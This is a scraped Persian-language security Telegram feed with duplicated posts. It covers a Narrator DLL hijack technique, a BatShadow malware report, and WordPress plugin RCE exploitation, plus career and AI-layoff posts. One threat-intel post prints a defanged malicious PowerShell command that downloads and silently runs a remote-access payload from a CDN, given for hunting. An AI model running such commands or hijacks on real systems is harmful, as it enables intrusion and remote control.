https://medium.com/@Aacle/ssrf-part-3-advanced-tricks-timing-channels-out-of-the-box-detection-693c07c97015
⭐️ @RadvanSec
⭐️ @RadvanSec
Medium
SSRF — Part 3: Advanced Tricks, Timing Channels & Out-of-the-Box Detection 🚀
Subnoscript: The secret-sauce volume for bug bounty hunters — defensive-first, high-signal techniques that convert sketchy SSRF signs into…
❤5
⭐️کابوس اخراج و حذف کارمندان و جایگزینی هوش مصنوعی
🔹هوش مصنوعی باعث حذف ۱۴ هزار شغل در یک شرکت آمازون
به نقل از رویترز،
🔹شرکت آمریکایی آمازون حدود ۱۴۰۰۰ شغل شرکتی را حذف خواهد کرد تا هزینههای خود را در بخش هوش مصنوعی افزایش دهد.
🔻بث گالتی، معاون ارشد بخش تجربه و فناوری کارکنان آمازون، ديروز سهشنبه در نامهای به کارمندان نوشت که به اکثر کارمندان ۹۰ روز فرصت داده میشود تا به دنبال موقعیت شغلی جدیدی در داخل شرکت باشند. آمازون اخیرا اعلام کرد قصد دارد ۱۰ میلیارد دلار برای ساخت یک پردیس در کارولینای شمالی سرمایهگذاری کند تا زیرساختهای محاسبات ابری و هوش مصنوعی خود را گسترش دهد.
🔻دوستان به سمت حوزه AGI پیش برید.سعی کنید همسو با انقلاب صنعتی چهارم هرچه سریعتر پیش برید.☺️
با این شوک حذف کارمندان که در دنیا در حال گسترش هست و بیشتر بخاطر AGI هست.
https://learninghive.ir/%d9%87%d9%88%d8%b4-%d9%85%d8%b5%d9%86%d9%88%d8%b9%db%8c-%d8%b9%d9%85%d9%88%d9%85%db%8c-%db%8c%d8%a7-agi/
⭐️ @RadvanSec
🔹هوش مصنوعی باعث حذف ۱۴ هزار شغل در یک شرکت آمازون
به نقل از رویترز،
🔹شرکت آمریکایی آمازون حدود ۱۴۰۰۰ شغل شرکتی را حذف خواهد کرد تا هزینههای خود را در بخش هوش مصنوعی افزایش دهد.
🔻بث گالتی، معاون ارشد بخش تجربه و فناوری کارکنان آمازون، ديروز سهشنبه در نامهای به کارمندان نوشت که به اکثر کارمندان ۹۰ روز فرصت داده میشود تا به دنبال موقعیت شغلی جدیدی در داخل شرکت باشند. آمازون اخیرا اعلام کرد قصد دارد ۱۰ میلیارد دلار برای ساخت یک پردیس در کارولینای شمالی سرمایهگذاری کند تا زیرساختهای محاسبات ابری و هوش مصنوعی خود را گسترش دهد.
🔻دوستان به سمت حوزه AGI پیش برید.سعی کنید همسو با انقلاب صنعتی چهارم هرچه سریعتر پیش برید.☺️
با این شوک حذف کارمندان که در دنیا در حال گسترش هست و بیشتر بخاطر AGI هست.
https://learninghive.ir/%d9%87%d9%88%d8%b4-%d9%85%d8%b5%d9%86%d9%88%d8%b9%db%8c-%d8%b9%d9%85%d9%88%d9%85%db%8c-%db%8c%d8%a7-agi/
⭐️ @RadvanSec
آکادمی آموزشی کندوی دانش
هوش مصنوعی عمومی یا AGI - آکادمی آموزشی کندوی دانش
در چند دههی اخیر، هوش مصنوعی (AI) به یکی از بزرگترین انقلابهای فناوری در تاریخ بشر تبدیل شده است. این فناوری حالا در تمام جنبههای زندگی ما حضور دارد؛ از
تکنیک Narrator DLL Hijack
ویندوز ابزاری به نام Narrator دارد که برای دسترسی افراد دارای نیازهای ویژه (Accessibility) کاربرد دارد.
Narrator.exe هنگام اجرا یک DLL به نام MSTTSLocOneCoreEnUS.dll را بارگذاری میکند که باید در مسیر %windir%\system32\speech_onecore\engines\tts باشد.
اگر حملهکننده بتواند نسخه مخربی از این DLL را در همان مسیر قرار دهد، با اجرای Narrator کد مخرب اجرا خواهد شد (بدون نیاز به وارد کردن توابع export خاص).
برای فریب بیشتر، در اثبات مفهوم (PoC) ارائه شده، سازندگان یک نسخه از DLL را طوری تغییر دادهاند که Narrator در حالت «سکوت» اجرا شود (یعنی صدایی تولید نکند یا نشان دادن چیزی نداشته باشد) تا کاربر متوجه نشود که چیزی غیرعادی در حال رخ دادن است.
⭐️ @RadvanSec
ویندوز ابزاری به نام Narrator دارد که برای دسترسی افراد دارای نیازهای ویژه (Accessibility) کاربرد دارد.
Narrator.exe هنگام اجرا یک DLL به نام MSTTSLocOneCoreEnUS.dll را بارگذاری میکند که باید در مسیر %windir%\system32\speech_onecore\engines\tts باشد.
اگر حملهکننده بتواند نسخه مخربی از این DLL را در همان مسیر قرار دهد، با اجرای Narrator کد مخرب اجرا خواهد شد (بدون نیاز به وارد کردن توابع export خاص).
برای فریب بیشتر، در اثبات مفهوم (PoC) ارائه شده، سازندگان یک نسخه از DLL را طوری تغییر دادهاند که Narrator در حالت «سکوت» اجرا شود (یعنی صدایی تولید نکند یا نشان دادن چیزی نداشته باشد) تا کاربر متوجه نشود که چیزی غیرعادی در حال رخ دادن است.
⭐️ @RadvanSec
❤🔥1❤1👍1
Forwarded from Try Hack Box
📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه:
با وجود اینکه این دستور خیلی رایجه و بهراحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:
@TryHackBox
#LNKMalware #PowerShell #Malicious
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b-cdn[.]net/Marriott_Marketing_Job_Denoscription.pdf' -OutFile 'C:\Users\Public\Marriott.pdf'; Start-Process 'C:\Users\Public\Marriott.pdf'; Start-Sleep -Seconds 3; iwr 'hxxps://555555cnd.b-cdn[.]net/002.zip' -OutFile 'C:\Users\Public\002.zip'; Expand-Archive -Path 'C:\Users\Public\002.zip' -DestinationPath 'C:\Users\Public' -Force; Start-Process 'C:\Users\Public\XtraViewer.exe' -ArgumentList '/silent_start' } catch {}"با وجود اینکه این دستور خیلی رایجه و بهراحتی میشه کشفش کرد، استفاده از Bunny CDN جالب به نظر میرسه. و البته، ما میتونیم ازش برای شکار (hunting) استفاده کنیم:
event_type: "dnsreqwin"
AND
dns_rname: "b-cdn.net"
@TryHackBox
#LNKMalware #PowerShell #Malicious
❤1
Try Hack Box
📃 طبق این گزارش مهاجم از یه فایل LNK مخرب برای اجرای یه دستور مخفی PowerShell استفاده کرده که یه سند PDF جعلی (lure) و یه فایل ZIP دیگه رو از آدرس Bunny CDN دانلود میکنه: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "try { iwr 'hxxps://555555cnd.b…
خلاصه کوتاه
گروه تهدیدی که محققان آن را BatShadow نامیدهاند، با یک کمپین هدفمند به دنبال جذب و آلودهسازی افراد شاغل در حوزههای دیجیتال (مثل جویندگان کار و دیجیتال مارکترها) است. آنها از مهندسی اجتماعیِ دقیق (آگهیهای شغلی/لینکهای جعلی) استفاده میکنند و فایلهای ZIP حاوی اسناد طعمه و یک فایل مخفی .LNK یا .exe را به قربانی میرسانند. پس از اجرا، یک باینری نوشتهشده با Go (که محققان آن را «Vampire bot» مینامند) نصب میشود و با ویژگیهای زیر رفتار میکند:
شناسایی و پروفایل کامل میزبان (HWID، یوزرنیم، OS، آنتیویروسهای نصبشده، آیپیها و غیره).
ارسال یک beacon اولیه رمزنگاریشده (JSON) به C2 با اطلاعات کامل.
گرفتن اسکرینشاتهای دورهای (real-time desktop capture) با استفاده از کتابخانهی Go (kbinani) و ذخیره بهصورت WEBP.
رمزنگاری دادهها با AES-CBC (کلید از یک UUID سختکدشده مشتق میشود) و فرستادن آنها داخل ترافیک HTTPS به سرورهای C2 (مثلاً endpointهایی مثل api3.samsungcareers.work/api/...).
یک حلقهٔ دائمی C2 برای دریافت دستورات (download/execute، تغییر تنظیمات captureInterval/captureQuality و …).
پنهانسازی و تداوم: کپی خود به مسیرهای مخفی (مثلاً داخل AppData\Local\Packages\edge)، ایجاد mutex و استفاده از ابزارهای قانونی مانند XtraViewer برای پنهانسازی کنترل از راه دور.
Aryaka Unified SASE Solution For Secure
نحوهٔ نفوذ و ترفندهای اجتماعی (لِیِر)
طعمهها معمولاً با ZIP حاوی چند PDF و یک فایل LNK که شبیه PDF است فریب داده میشوند.
لینکهای فیک به صفحات شغلی جعلی هدایت میکنند که قربانی را ترغیب میکنند فایل را «در Edge» باز کند — این ترفند برای دورزدن جلوگیریگرهای مرورگر انجام میشود.
بعد از کلیک، payload از CDN دانلود و اجرا میشود.
Aryaka Unified SASE Solution For Secure
تکنیکهای فنی برجسته
زبان Go برای ساخت باینری (cross-platform، سختتر برای آنتیویروسها).
AES-CBC با کلید مشتقشده از UUID سختکدشده؛ انتقال در قالب JSON با IV+ciphertext هِگزشده.
تصاویر WEBP برای اسکرینشاتها (حجم کم، مخفیسازی بهتر).
C2 over HTTPS با هدر X-Api-Key که همان UUID است — ترافیک شبیه ترافیک معمول HTTPS بهنظر میرسد.
Aryaka Unified SASE Solution For Secure
شاخصهای سازش (IoC) — نمونهها (از گزارش)
نامهای فایل/ZIP مانند: ATG_Technology_Group_Marketing_Job_Denoscription.zip, Marriott_Marketing_Job_Denoscription.zip
دامنه/USB: نمونه endpoint ذکرشده: api3.samsungcareers.work (در گزارش بهعنوان مقصد C2).
رفتار قابل شناسایی: فرایندهایی که فایل exe را داخل پوشهٔ AppData\Local\Packages\edge ایجاد میکنند؛ mutex با نام edge; ترافیک HTTPS با JSON payload حاوی فیلدهای fingerprint.
(برای استخراج کامل IoCها میتونم Appendix A در PDF را دقیقاً بیرون بکشم و لیست کامل ارائه کنم).
Aryaka Unified SASE Solution For Secure
تطابق با MITRE ATT&CK (خلاصه)
چند تکنیک اصلی که در گزارش ذکر شده با ماتریکس ATT&CK مطابقت دارد:
Initial Access: Phishing / Spearphishing Attachment (T1566.001)
Execution: User Execution via LNK/EXE (T1204)
Persistence: Masquerading, Service/Startup persistence (T1036, T1547)
Collection: Screen Capture (T1113), System Information Discovery (T1082)
Command and Control: Application Layer Protocol over HTTPS (T1071.001)
Exfiltration: Exfil over C2 channel (T1041)
(گزارش Appendix B نقشهٔ کاملتری دارد).
Aryaka Unified SASE Solution For Secure
توصیههای دفاعی عملی (عملی و سریع)
کاربر را آموزش بدهید — هشدار دربارهٔ ZIP/PDFهای شغلی و فایلهای LNK که شبیه PDF نمایش داده میشوند.
بلاک کردن و مانیتورینگ دامنهها/CDNهای مشکوک ذکرشده در IoC.
جلوگیری از اجرای فایلهای LNK از پوشههای دانلود/عمومی با سیاستهای AppLocker/Windows Defender Application Control.
محدودیت استفاده از ابزارهای remote-access (مثل XtraViewer) یا اعمال سیاست MFA، whitelisting و مانیتورینگ نشستها.
EDR/AV را تنظیم کنید تا رفتارهای مشکوک (کپی به AppData\Local\Packages\edge، ساخت mutex، استفاده از کتابخانه kbinani برای اسکرینشات) را شناسایی کند.
TLS inspection / proxy برای شناسایی الگوهای JSON مشکوک و X-Api-Keyها (در محیطهای مجاز)؛ یا لااقل شبکههای خروجی را به سرورهای غیرضروری محدود کنید.
بکاپ آفلاین و رمزگذاری دیسک و حفظ دسترسیهای SSH/credential امن.
⭐️ @RadvanSec
گروه تهدیدی که محققان آن را BatShadow نامیدهاند، با یک کمپین هدفمند به دنبال جذب و آلودهسازی افراد شاغل در حوزههای دیجیتال (مثل جویندگان کار و دیجیتال مارکترها) است. آنها از مهندسی اجتماعیِ دقیق (آگهیهای شغلی/لینکهای جعلی) استفاده میکنند و فایلهای ZIP حاوی اسناد طعمه و یک فایل مخفی .LNK یا .exe را به قربانی میرسانند. پس از اجرا، یک باینری نوشتهشده با Go (که محققان آن را «Vampire bot» مینامند) نصب میشود و با ویژگیهای زیر رفتار میکند:
شناسایی و پروفایل کامل میزبان (HWID، یوزرنیم، OS، آنتیویروسهای نصبشده، آیپیها و غیره).
ارسال یک beacon اولیه رمزنگاریشده (JSON) به C2 با اطلاعات کامل.
گرفتن اسکرینشاتهای دورهای (real-time desktop capture) با استفاده از کتابخانهی Go (kbinani) و ذخیره بهصورت WEBP.
رمزنگاری دادهها با AES-CBC (کلید از یک UUID سختکدشده مشتق میشود) و فرستادن آنها داخل ترافیک HTTPS به سرورهای C2 (مثلاً endpointهایی مثل api3.samsungcareers.work/api/...).
یک حلقهٔ دائمی C2 برای دریافت دستورات (download/execute، تغییر تنظیمات captureInterval/captureQuality و …).
پنهانسازی و تداوم: کپی خود به مسیرهای مخفی (مثلاً داخل AppData\Local\Packages\edge)، ایجاد mutex و استفاده از ابزارهای قانونی مانند XtraViewer برای پنهانسازی کنترل از راه دور.
Aryaka Unified SASE Solution For Secure
نحوهٔ نفوذ و ترفندهای اجتماعی (لِیِر)
طعمهها معمولاً با ZIP حاوی چند PDF و یک فایل LNK که شبیه PDF است فریب داده میشوند.
لینکهای فیک به صفحات شغلی جعلی هدایت میکنند که قربانی را ترغیب میکنند فایل را «در Edge» باز کند — این ترفند برای دورزدن جلوگیریگرهای مرورگر انجام میشود.
بعد از کلیک، payload از CDN دانلود و اجرا میشود.
Aryaka Unified SASE Solution For Secure
تکنیکهای فنی برجسته
زبان Go برای ساخت باینری (cross-platform، سختتر برای آنتیویروسها).
AES-CBC با کلید مشتقشده از UUID سختکدشده؛ انتقال در قالب JSON با IV+ciphertext هِگزشده.
تصاویر WEBP برای اسکرینشاتها (حجم کم، مخفیسازی بهتر).
C2 over HTTPS با هدر X-Api-Key که همان UUID است — ترافیک شبیه ترافیک معمول HTTPS بهنظر میرسد.
Aryaka Unified SASE Solution For Secure
شاخصهای سازش (IoC) — نمونهها (از گزارش)
نامهای فایل/ZIP مانند: ATG_Technology_Group_Marketing_Job_Denoscription.zip, Marriott_Marketing_Job_Denoscription.zip
دامنه/USB: نمونه endpoint ذکرشده: api3.samsungcareers.work (در گزارش بهعنوان مقصد C2).
رفتار قابل شناسایی: فرایندهایی که فایل exe را داخل پوشهٔ AppData\Local\Packages\edge ایجاد میکنند؛ mutex با نام edge; ترافیک HTTPS با JSON payload حاوی فیلدهای fingerprint.
(برای استخراج کامل IoCها میتونم Appendix A در PDF را دقیقاً بیرون بکشم و لیست کامل ارائه کنم).
Aryaka Unified SASE Solution For Secure
تطابق با MITRE ATT&CK (خلاصه)
چند تکنیک اصلی که در گزارش ذکر شده با ماتریکس ATT&CK مطابقت دارد:
Initial Access: Phishing / Spearphishing Attachment (T1566.001)
Execution: User Execution via LNK/EXE (T1204)
Persistence: Masquerading, Service/Startup persistence (T1036, T1547)
Collection: Screen Capture (T1113), System Information Discovery (T1082)
Command and Control: Application Layer Protocol over HTTPS (T1071.001)
Exfiltration: Exfil over C2 channel (T1041)
(گزارش Appendix B نقشهٔ کاملتری دارد).
Aryaka Unified SASE Solution For Secure
توصیههای دفاعی عملی (عملی و سریع)
کاربر را آموزش بدهید — هشدار دربارهٔ ZIP/PDFهای شغلی و فایلهای LNK که شبیه PDF نمایش داده میشوند.
بلاک کردن و مانیتورینگ دامنهها/CDNهای مشکوک ذکرشده در IoC.
جلوگیری از اجرای فایلهای LNK از پوشههای دانلود/عمومی با سیاستهای AppLocker/Windows Defender Application Control.
محدودیت استفاده از ابزارهای remote-access (مثل XtraViewer) یا اعمال سیاست MFA، whitelisting و مانیتورینگ نشستها.
EDR/AV را تنظیم کنید تا رفتارهای مشکوک (کپی به AppData\Local\Packages\edge، ساخت mutex، استفاده از کتابخانه kbinani برای اسکرینشات) را شناسایی کند.
TLS inspection / proxy برای شناسایی الگوهای JSON مشکوک و X-Api-Keyها (در محیطهای مجاز)؛ یا لااقل شبکههای خروجی را به سرورهای غیرضروری محدود کنید.
بکاپ آفلاین و رمزگذاری دیسک و حفظ دسترسیهای SSH/credential امن.
⭐️ @RadvanSec
❤3
هکرها طی دو روز، ۸.۷ میلیون سایت وردپرسی را هک کردند — حمله از طریق آسیبپذیریهای بحرانی در افزونههای محبوب انجام شده است
🗓 تاریخ: ۲۶ اکتبر ۲۰۲۵ | منبع: SecurityLab
یک کارزار بزرگِ سوءاستفاده از آسیبپذیریها، سایتهای وردپرسی را هدف قرار داده است. مهاجمان به سایتهایی حمله میکنند که افزونههای GutenKit و Hunk Companion روی آنها نصب شده است. این افزونهها دارای باگهای بحرانی هستند که امکان اجرای کد دلخواه روی سرور (Remote Code Execution) را فراهم میکنند.
شرکت Wordfence (متخصص در حفاظت از سایتهای وردپرسی) اعلام کرده که تنها در دو روز — ۸ و ۹ اکتبر — بیش از ۸.۷ میلیون حمله ثبت شده است.
جزئیات آسیبپذیریها
این حملات از سه آسیبپذیری با شناسههای زیر سوءاستفاده میکنند:
CVE-2024-9234
CVE-2024-9707
CVE-2024-11972
تمامی این آسیبپذیریها دارای بالاترین سطح خطر (CVSS 9.8) هستند.
🔹 CVE-2024-9234 در افزونه GutenKit (با بیش از ۴۰ هزار نصب فعال) کشف شده است.
این نقص در بخش REST endpoint افزونه قرار دارد و به مهاجم اجازه میدهد بدون هیچ مجوزی، افزونههای دلخواه خود را از راه دور نصب کند.
🔹 دو مورد دیگر، یعنی CVE-2024-9707 و CVE-2024-11972، در افزونه Hunk Companion (نصبشده روی حدود ۸۰۰۰ سایت) وجود دارند.
در این دو آسیبپذیری نیز بررسی سطح دسترسی انجام نمیشود؛ در نتیجه مهاجم میتواند هر افزونهای، حتی افزونه حاوی بدافزار را نصب کند.
پس از نصب افزونه مخرب، مهاجم میتواند دستورات دلخواه را روی سرور اجرا کرده و به اجرای کد از راه دور (RCE) دست یابد.
نسخههای آسیبپذیر
GutenKit: نسخههای ۲.۱.۰ و قبل از آن آسیبپذیرند.
Hunk Companion: نسخههای ۱.۸.۴ و ۱.۸.۵ (و تمام نسخههای قبل از آن) دارای نقص هستند.
رفع باگها مدتها قبل منتشر شده است:
در GutenKit 2.1.1 (اکتبر ۲۰۲۴)
در Hunk Companion 1.9.0 (دسامبر ۲۰۲۴)
اما بسیاری از سایتها هنوز از نسخههای قدیمی و آسیبپذیر استفاده میکنند.
نحوه حمله
طبق گزارش Wordfence، مهاجمان در GitHub آرشیوی به نام up.zip منتشر کردهاند که حاوی یک افزونه جعلی است.
درون این فایل، اسکریپتهای رمزگذاریشدهای وجود دارد که قابلیتهای زیر را دارند:
دانلود، حذف یا ویرایش فایلها
مدیریت سطح دسترسی کاربران
یکی از فایلهای موجود در این بسته، با رمز محافظت شده و در ظاهر شبیه به افزونهی All in SEO است؛ اما در واقع برای ورود خودکار به حساب کاربری ادمین استفاده میشود.
پس از نصب این افزونه، مهاجمان دسترسی دائمی به سایت پیدا میکنند و میتوانند:
دادهها را سرقت یا دانلود کنند
دستورات سیستم را اجرا کنند
یا اطلاعات خصوصی پردازششده توسط سایت را ردیابی کنند
در صورتی که موفق به نصب بکدور کامل نشوند، از افزونه دیگری به نام wp-query-console استفاده میکنند که خود دارای آسیبپذیری اجرای کد بدون نیاز به احراز هویت است.
علائم آلودگی
Wordfence فهرستی از آدرسهای IP منتشر کرده است که منبع اصلی این درخواستهای مخرب هستند (برای فیلتر کردن در سطح سرور قابل استفادهاند).
همچنین، کارشناسان پیشنهاد میکنند در لاگها به دنبال درخواستهای زیر بگردید:
و همچنین پوشههای زیر را بررسی کنید:
وجود فایلهای ناشناس در این مسیرها میتواند نشانه هک بودن سایت باشد.
منبع خبر : https://www.securitylab.ru/news/565109.php
⭐️ @RadvanSec
🗓 تاریخ: ۲۶ اکتبر ۲۰۲۵ | منبع: SecurityLab
یک کارزار بزرگِ سوءاستفاده از آسیبپذیریها، سایتهای وردپرسی را هدف قرار داده است. مهاجمان به سایتهایی حمله میکنند که افزونههای GutenKit و Hunk Companion روی آنها نصب شده است. این افزونهها دارای باگهای بحرانی هستند که امکان اجرای کد دلخواه روی سرور (Remote Code Execution) را فراهم میکنند.
شرکت Wordfence (متخصص در حفاظت از سایتهای وردپرسی) اعلام کرده که تنها در دو روز — ۸ و ۹ اکتبر — بیش از ۸.۷ میلیون حمله ثبت شده است.
جزئیات آسیبپذیریها
این حملات از سه آسیبپذیری با شناسههای زیر سوءاستفاده میکنند:
CVE-2024-9234
CVE-2024-9707
CVE-2024-11972
تمامی این آسیبپذیریها دارای بالاترین سطح خطر (CVSS 9.8) هستند.
🔹 CVE-2024-9234 در افزونه GutenKit (با بیش از ۴۰ هزار نصب فعال) کشف شده است.
این نقص در بخش REST endpoint افزونه قرار دارد و به مهاجم اجازه میدهد بدون هیچ مجوزی، افزونههای دلخواه خود را از راه دور نصب کند.
🔹 دو مورد دیگر، یعنی CVE-2024-9707 و CVE-2024-11972، در افزونه Hunk Companion (نصبشده روی حدود ۸۰۰۰ سایت) وجود دارند.
در این دو آسیبپذیری نیز بررسی سطح دسترسی انجام نمیشود؛ در نتیجه مهاجم میتواند هر افزونهای، حتی افزونه حاوی بدافزار را نصب کند.
پس از نصب افزونه مخرب، مهاجم میتواند دستورات دلخواه را روی سرور اجرا کرده و به اجرای کد از راه دور (RCE) دست یابد.
نسخههای آسیبپذیر
GutenKit: نسخههای ۲.۱.۰ و قبل از آن آسیبپذیرند.
Hunk Companion: نسخههای ۱.۸.۴ و ۱.۸.۵ (و تمام نسخههای قبل از آن) دارای نقص هستند.
رفع باگها مدتها قبل منتشر شده است:
در GutenKit 2.1.1 (اکتبر ۲۰۲۴)
در Hunk Companion 1.9.0 (دسامبر ۲۰۲۴)
اما بسیاری از سایتها هنوز از نسخههای قدیمی و آسیبپذیر استفاده میکنند.
نحوه حمله
طبق گزارش Wordfence، مهاجمان در GitHub آرشیوی به نام up.zip منتشر کردهاند که حاوی یک افزونه جعلی است.
درون این فایل، اسکریپتهای رمزگذاریشدهای وجود دارد که قابلیتهای زیر را دارند:
دانلود، حذف یا ویرایش فایلها
مدیریت سطح دسترسی کاربران
یکی از فایلهای موجود در این بسته، با رمز محافظت شده و در ظاهر شبیه به افزونهی All in SEO است؛ اما در واقع برای ورود خودکار به حساب کاربری ادمین استفاده میشود.
پس از نصب این افزونه، مهاجمان دسترسی دائمی به سایت پیدا میکنند و میتوانند:
دادهها را سرقت یا دانلود کنند
دستورات سیستم را اجرا کنند
یا اطلاعات خصوصی پردازششده توسط سایت را ردیابی کنند
در صورتی که موفق به نصب بکدور کامل نشوند، از افزونه دیگری به نام wp-query-console استفاده میکنند که خود دارای آسیبپذیری اجرای کد بدون نیاز به احراز هویت است.
علائم آلودگی
Wordfence فهرستی از آدرسهای IP منتشر کرده است که منبع اصلی این درخواستهای مخرب هستند (برای فیلتر کردن در سطح سرور قابل استفادهاند).
همچنین، کارشناسان پیشنهاد میکنند در لاگها به دنبال درخواستهای زیر بگردید:
/wp-json/gutenkit/v1/install-active-plugin
/wp-json/hc/v1/themehunk-import
و همچنین پوشههای زیر را بررسی کنید:
/up
/background-image-cropper
/ultra-seo-processor-wp
/oke
/wp-query-console
وجود فایلهای ناشناس در این مسیرها میتواند نشانه هک بودن سایت باشد.
منبع خبر : https://www.securitylab.ru/news/565109.php
⭐️ @RadvanSec
SecurityLab.ru
Хакеры захватили 8,7 млн WordPress-сайтов за два дня — атакуют через критические уязвимости в популярных плагинах
Рекордная волна нападений против GutenKit и Hunk Companion с десятками тысяч установок.
❤2👌1
ابزار «SalesQL» یک سرویس آنلاین برای پیدا کردن، استخراج و تأیید اطلاعات تماس (ایمیل، تلفن و …) از شبکه حرفهای LinkedIn و سایر منابع است.
salesql.com
⭐️ @RadvanSec
salesql.com
⭐️ @RadvanSec
🔥2❤1👌1
Forwarded from PentesterLand Academy - Public
خوشحال میشم به من بگید
این سبک پاسخ دادن توهین به مخاطب هست؟
این بار پرسش و پاسخ برعکس داریم و من از شما عزیزان میپرسم❤️🙏🏼
شاید واقعا توهین امیزه بوده جوابم خودم نمیدونم
ولی به نظرم اون جوابی بود که خیلیا تو این کامیونیتی باید میگرفتن و نیاز بود محکم گفته بشه
https://www.instagram.com/reel/DQhNpbLjdjX/?igsh=dWZ2dTRrcXI3bXk3
این سبک پاسخ دادن توهین به مخاطب هست؟
این بار پرسش و پاسخ برعکس داریم و من از شما عزیزان میپرسم❤️🙏🏼
شاید واقعا توهین امیزه بوده جوابم خودم نمیدونم
ولی به نظرم اون جوابی بود که خیلیا تو این کامیونیتی باید میگرفتن و نیاز بود محکم گفته بشه
https://www.instagram.com/reel/DQhNpbLjdjX/?igsh=dWZ2dTRrcXI3bXk3
❤4👏1
Forwarded from PentesterLand Academy - Public
ایا بدون تجربه کار میشه حقوق بالا ۵۰ داشت؟ بله میشه
چجوری؟
زمانی که شخص برای کار اماده باشه و صرفا عدم تجربش به دلیل این باشه جایی استخدام نشده تا الان
چجوری اماده بشه؟
حل لب ها و کار روی تارگت ها واقعی
مطالعه زیاد
و حتی انتقال دانش
و از همه مهم تر اماده شدن برای مصاحبه
ولی این وسط افرادی هستند که عاشق نیروی کار ارزونن و اتفاقا این افراد شما رو می بلعن، انگیزه شما رو نابود میکنند
یکی از همین افراد که چندین بار با دانشجویان ما مصاحبه کرد، از روی اتفاق هربارم این جمله رو گفته:
“از نظر من حقوق پیشنهادیت خوبه برای تو ولی احتمالا قبول نکنن چونتجربه اولته حالا مت تلاشم رو میکنم”
و نکته جالب اینه که هیچ کدوم از تلاش ها هم به ثمر نرسیده
برای تکمیل صحبت ها این پست لینکدین رو ببینید
https://www.linkedin.com/posts/reza-sharifzade-649a8b18a_%D8%AD%D9%88%D8%A7%D8%B3%D8%AA%D9%88%D9%86-%D8%A8%D9%87-%D8%B4%D8%AF%D8%AA-%D8%A8%D9%87-%D8%A7%D9%81%D8%B1%D8%A7%D8%AF%DB%8C-%D8%A8%D8%A7%D8%B4%D9%87-%DA%A9%D9%87-%D9%85%DB%8C%D8%AE%D9%88%D8%A7%D9%86-%D8%AC%D8%A7-activity-7390621557091561472-5aT2?utm_medium=ios_app&rcm=ACoAACynbdkBjwS7XkCf7Nkb04x0i6a-3_jtLFM&utm_source=social_share_send&utm_campaign=copy_link
چجوری؟
زمانی که شخص برای کار اماده باشه و صرفا عدم تجربش به دلیل این باشه جایی استخدام نشده تا الان
چجوری اماده بشه؟
حل لب ها و کار روی تارگت ها واقعی
مطالعه زیاد
و حتی انتقال دانش
و از همه مهم تر اماده شدن برای مصاحبه
ولی این وسط افرادی هستند که عاشق نیروی کار ارزونن و اتفاقا این افراد شما رو می بلعن، انگیزه شما رو نابود میکنند
یکی از همین افراد که چندین بار با دانشجویان ما مصاحبه کرد، از روی اتفاق هربارم این جمله رو گفته:
“از نظر من حقوق پیشنهادیت خوبه برای تو ولی احتمالا قبول نکنن چونتجربه اولته حالا مت تلاشم رو میکنم”
و نکته جالب اینه که هیچ کدوم از تلاش ها هم به ثمر نرسیده
برای تکمیل صحبت ها این پست لینکدین رو ببینید
https://www.linkedin.com/posts/reza-sharifzade-649a8b18a_%D8%AD%D9%88%D8%A7%D8%B3%D8%AA%D9%88%D9%86-%D8%A8%D9%87-%D8%B4%D8%AF%D8%AA-%D8%A8%D9%87-%D8%A7%D9%81%D8%B1%D8%A7%D8%AF%DB%8C-%D8%A8%D8%A7%D8%B4%D9%87-%DA%A9%D9%87-%D9%85%DB%8C%D8%AE%D9%88%D8%A7%D9%86-%D8%AC%D8%A7-activity-7390621557091561472-5aT2?utm_medium=ios_app&rcm=ACoAACynbdkBjwS7XkCf7Nkb04x0i6a-3_jtLFM&utm_source=social_share_send&utm_campaign=copy_link
Linkedin
حواستون به شدت به افرادی باشه که میخوان جا بندازن نیروی کار با اولین تجربه باید با حقوق کم شروع کنه!
افرادی که سودشون تو اینه که…
افرادی که سودشون تو اینه که…
حواستون به شدت به افرادی باشه که میخوان جا بندازن نیروی کار با اولین تجربه باید با حقوق کم شروع کنه!
افرادی که سودشون تو اینه که برای شرکتی که کار میکنند نیروی ارزون استخدام کنند با وجود اینکه میدونن اون نیرو ارزشش بیشتره!
عزیزان اگه کسی به شما گفت بخاطر…
افرادی که سودشون تو اینه که برای شرکتی که کار میکنند نیروی ارزون استخدام کنند با وجود اینکه میدونن اون نیرو ارزشش بیشتره!
عزیزان اگه کسی به شما گفت بخاطر…
👍4👏2❤1
Reza Sh
ایا بدون تجربه کار میشه حقوق بالا ۵۰ داشت؟ بله میشه چجوری؟ زمانی که شخص برای کار اماده باشه و صرفا عدم تجربش به دلیل این باشه جایی استخدام نشده تا الان چجوری اماده بشه؟ حل لب ها و کار روی تارگت ها واقعی مطالعه زیاد و حتی انتقال دانش و از همه مهم تر اماده…
ارزون کار نکنید عزیزان
و مراقب افرادی باشید که ارزون کار کردن رو عادی جلوه میدهند
و مراقب افرادی باشید که ارزون کار کردن رو عادی جلوه میدهند
👌5❤3👍3
Forwarded from Linuxor ?
چین و سنگاپور در حال جمع آوری سنگین دیتا از کل اینترنت هستند
طبق داده های سایت تله کانال لینوکسور متوجه شدیم چین با یک مجموعه 60 هزار تایی ربات در حال تغذیه دیتا از سایت ها هستند، این دیتا ها احتمالا برای مدل های هوش مصنوعی جمع آوری میشوند.
برای درک عظمت این تعداد، یوزر های آمریکا ربات های گوگل و chatgpt هستند که در مجموع فقط 500 عدد هستند.
@Linuxor
طبق داده های سایت تله کانال لینوکسور متوجه شدیم چین با یک مجموعه 60 هزار تایی ربات در حال تغذیه دیتا از سایت ها هستند، این دیتا ها احتمالا برای مدل های هوش مصنوعی جمع آوری میشوند.
برای درک عظمت این تعداد، یوزر های آمریکا ربات های گوگل و chatgpt هستند که در مجموع فقط 500 عدد هستند.
@Linuxor
❤3👍2🔥1